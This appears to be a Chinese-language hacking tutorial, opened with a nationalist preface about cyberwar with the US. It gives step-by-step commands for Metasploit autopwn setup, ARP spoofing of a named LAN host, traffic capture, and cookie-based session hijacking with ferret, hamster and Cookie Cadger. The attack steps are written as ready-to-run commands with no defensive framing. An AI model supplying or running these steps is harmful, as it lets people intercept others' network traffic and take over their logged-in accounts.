前言:中美网战打响的那一刹那,中国已经落后很多年。然而,我们一直没有停止学习的脚步,“师夷长技以制夷”——我们一直奋斗在战争的第一线。经过漫长的沉淀,原来你就在身边不远处。
注:实际过程中可能会遇到以下错误。
错误描述:
msf> db_status
postgres selected, no connection
解决办法:
service postgres start
msfdb init
执行命令后,重启msf便会自动连接到数据库。
错误描述
msf > db_autopwn -t -p -r -e
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
解决办法:
到GitHub上下载该插件,并放到/usr/share/metasploit-framework/plugins目录下即可。
下载地址:
https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb
工具:arpspoof、wireshark、ferret、hamster
① 开启数据转发:
echo 1 >/proc/sys/net/ipv4/ip_forward
② 开启arp欺骗:
arpspoof -i eth0 -t 192.168.0.71 192.168.0.254
③ 开启wireshark进行抓包,抓包后需要导出为pcap文件;
④ 使用ferret解析文件,生成hasmter.txt文件:
ferret -r cookie.pcap
⑤ 打开hamster软件,然后将浏览器的代理设置为 127.0.0.1:1234;
⑥ 在浏览器中访问 http://127.0.0.1:1234 ,在页面中点击抓到的网页链接获得会话。
工具:ferret、hamster
① 开启ferret抓包:
ferret -i eth0
② 开启hamster:
hamster
③ 打开浏览器并设置好代理,然后访问http://127.0.0.1:1234,在页面中选择网卡可实时查看抓取到的会话。
工具:Cookie Cadger
① 打开软件并设置好网卡,然后开启抓包;
java -jar CookieCadger.jar
② 当局域网内有人上网涉及敏感信息,软件就会抓到数据包并罗列出来,只需点选某个网址,加载网站Cookies(Load Domain Cookies)即可实现会话劫持。
注:
① 实测中点击加载cookies后,软件一直“Loading request into browser,please wait...”,使用浏览器浏览也没有劫持到。
② 虽然是java编写的软件,但是在Win10下没找到网卡,无法使用。
Q
8.1 安装ferret时提示“E: 无法定位软件包 ferret”
① 设置更新源:
vim /etc/apt/sources.list // 打开更新源配置文件
deb http://http.kali.org/kali kali-rolling main non-free contrib
② 更新全部软件包:
apt-get update && apt-get dist-upgrade
③ 安装ferret:
apt-get install ferret-sidejack // 注意软件名是ferret-sidejack不是ferret,ferret是别的软件
注:有可能需要添加对32位的支持dpkg --add-architecture i386
Q
8.2 获取Cookie Cadger
wget https://www.cookiecadger.com/files/CookieCadger-1.08.jar
chmod +x CookieCadger-1.08.jar
mv CookieCadger-1.08.jar /usr/bin/
联系客服